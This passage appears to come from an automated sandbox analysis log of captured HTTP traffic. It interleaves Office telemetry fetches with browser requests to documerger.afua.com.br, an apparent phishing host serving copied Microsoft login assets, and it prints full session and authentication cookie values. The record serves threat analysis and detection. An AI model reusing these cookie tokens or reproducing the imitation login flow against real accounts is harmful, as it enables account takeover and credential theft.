esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe7J4HPqsUPUXeIg8xCHy7AUYYf1vFY6GCdCahZOs6ygrPOyD3SHcgG_JImwTwreMOcgA7MQdgG93ndMEop1y59oouDjj40cA28NUeMt0oDNLolNTeo4P7Rvgm7uW2XxPC9raSVwXLR8KtjVRbIKpVa6-wzvAk-1BMnzg_e-CtabAgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true HTTP/1.1Host: documerger.afua.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.orgAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; fpc=AnIF4PXDa21Bo9TCi_D-hPs; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe7J4HPqsUPUXeIg8xCHy7AUYYf1vFY6GCdCahZOs6ygrPOyD3SHcgG_JImwTwreMOcgA7MQdgG93ndMEop1y59oouDjj40cA28NUeMt0oDNLolNTeo4P7Rvgm7uW2XxPC9raSVwXLR8KtjVRbIKpVa6-wzvAk-1BMnzg_e-CtabAgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: documerger.afua.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.orgAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; fpc=AnIF4PXDa21Bo9TCi_D-hPs; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe7J4HPqsUPUXeIg8xCHy7AUYYf1vFY6GCdCahZOs6ygrPOyD3SHcgG_JImwTwreMOcgA7MQdgG93ndMEop1y59oouDjj40cA28NUeMt0oDNLolNTeo4P7Rvgm7uW2XxPC9raSVwXLR8KtjVRbIKpVa6-wzvAk-1BMnzg_e-CtabAgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
              Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: documerger.afua.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; fpc=AnIF4PXDa21Bo9TCi_D-hPs; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe7J4HPqsUPUXeIg8xCHy7AUYYf1vFY6GCdCahZOs6ygrPOyD3SHcgG_JImwTwreMOcgA7MQdgG93ndMEop1y59oouDjj40cA28NUeMt0oDNLolNTeo4P7Rvgm7uW2XxPC9raSVwXLR8KtjVRbIKpVa6-wzvAk-1BMnzg_e-CtabAgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css HTTP/1.1Host: documerger.afua.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js HTTP/1.1Host: documerger.afua.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1Host: documerger.afua.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1Host: documerger.afua.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js HTTP/1.1Host: documerger.afua.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js HTTP/1.1Host: documerger.afua.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAAGZJ2d4OAAAA
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: documerger.afua.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; 